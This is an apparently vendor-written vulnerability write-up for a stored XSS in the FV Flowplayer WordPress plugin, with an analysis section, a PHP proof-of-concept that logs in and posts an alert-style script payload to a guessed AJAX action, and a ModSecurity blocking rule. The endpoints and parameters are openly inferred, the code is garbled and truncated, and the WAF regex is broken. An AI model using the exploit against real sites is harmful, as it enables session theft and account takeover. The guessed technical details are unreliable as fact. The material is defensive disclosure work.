“`json
{
“analysis”: “Atomic Edge analysis of CVE-2026-49773 (metadata-based): This vulnerability is a Stored Cross-Site Scripting (XSS) in the FV Flowplayer Video Player plugin for WordPress, affecting versions up to and including 7.5.51.7212. Authenticated attackers with subscriber-level access or higher can inject arbitrary web scripts that execute when any user views the compromised page. The CVSS score of 6.4 reflects a moderate severity due to the requirement for authentication, but the impact is broadened by the scope change to other users.
Root Cause: Based on the CWE-79 classification and the description, the vulnerability stems from insufficient input sanitization and output escaping. The FV Flowplayer Video Player plugin likely processes user-supplied data (e.g., video URLs, shortcode attributes, metadata) that is stored in the database and later rendered on a page. Without proper sanitization (wp_kses, sanitize_text_field) and escaping (esc_html, esc_attr), an attacker can inject HTML and JavaScript. This is a common pattern in WordPress plugins where shortcode attributes or settings are not sanitized before saving or escaping when output. Without a code diff, we confirm this inference aligns with the CWE and descriptive metadata.
Exploitation: The attacker must have at least a subscriber-level account on the target WordPress site. The vector likely involves a WordPress AJAX action (e.g., admin-ajax.php) or a REST API endpoint that processes video player configuration. The attacker sends a crafted request with the action parameter corresponding to a FV Flowplayer settings update or shortcode save. The payload, such as ‘alert(document.cookie)’, is inserted into a text field or attribute (e.g., video title, URL, or a custom field). Once saved, this payload is stored and executed when an administrator or another user visits the page containing the player. The plugin slug fv-wordpress-flowplayer suggests endpoints like admin-ajax.php?action=fv_player_save_settings or a REST route like /wp-json/fv-flowplayer/v1/config.
Remediation: The fix requires implementing proper input validation and output escaping throughout the plugin. For all user-submitted data that gets stored, the plugin should use WordPress functions like sanitize_text_field(), sanitize_url(), or wp_kses_allowed_html() depending on the expected content. When rendering stored data in HTML attributes or tag bodies, the plugin must apply esc_attr() or esc_html() to neutralize any script injection. The patched version 7.5.51.7212 likely includes these sanitization and escaping corrections.
Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of any user visiting the infected page. This leads to session hijacking, credential theft via phishing overlays, forced actions on behalf of administrators (e.g., creating new admin accounts), and defacement. Since the XSS is stored, the attack persists until the infected content is removed or patched.”,
“poc_php”: “<?phpn// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2026-49773 – FV Flowplayer Video Player $username,n ‘pwd’ => $password,n ‘remember’ => ‘true’,n ‘wp-submit’ => ‘Log In’,n ‘redirect_to’ => $target_url . ‘/wp-admin/’,n ‘testcookie’ => ‘1’n);nncurl_setopt($ch, CURLOPT_URL, $login_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_COOKIEJAR, ‘cookies.txt’);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);n$response = curl_exec($ch);nif (strpos($response, ‘Dashboard’) === false) {n die(‘Login failed. Check credentials.’);n}necho “[+] Logged in as subscriber.\n”;nn// Step 2: Determine the AJAX action from the plugin (inferred: FV Flowplayer saves config via admin-ajax)n// Common actions: fvp_save_settings, fv_player_save_video, fv_flowplayer_updaten$ajax_url = $target_url . ‘/wp-admin/admin-ajax.php’;nn// XSS payload: injects a script into a video title or description fieldn$payload = ‘alert(“XSS by Atomic Edge”);’;nn// Assume the plugin uses action ‘fv_player_save’ with parameter ‘video_title’ (inferred)n$exploit_data = array(n ‘action’ => ‘fv_player_save’,n ‘video_id’ => ‘1’,n ‘video_title’ => $payload,n ‘video_url’ => ‘https://example.com/video.mp4’,n ‘_wpnonce’ => ” // Nonce may not be checked (common vulnerability)n);nncurl_setopt($ch, CURLOPT_URL, $ajax_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, $exploit_data);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);n$response = curl_exec($ch);nnif (strpos($response, ‘success’) !== false) {n echo “[+] XSS payload submitted successfully. Visit any page with the injected video to trigger.\n”;n} else {n echo “[-] Exploit may have failed. Check response:\n$response\n”;n}nncurl_close($ch);n?>n”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-49773 (metadata-based)n# Blocks stored XSS via FV Flowplayer AJAX save actionnSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:20261974,phase:2,deny,status:403,chain,msg:’CVE-2026-49773 – FV Flowplayer Stored XSS via AJAX’,severity:’CRITICAL’,tag:’CVE-2026-49773′”n SecRule ARGS_POST:action “@streq fv_player_save” “chain”n SecRule ARGS_POST:video_title “@rx ]*>.*”n”
}
“`
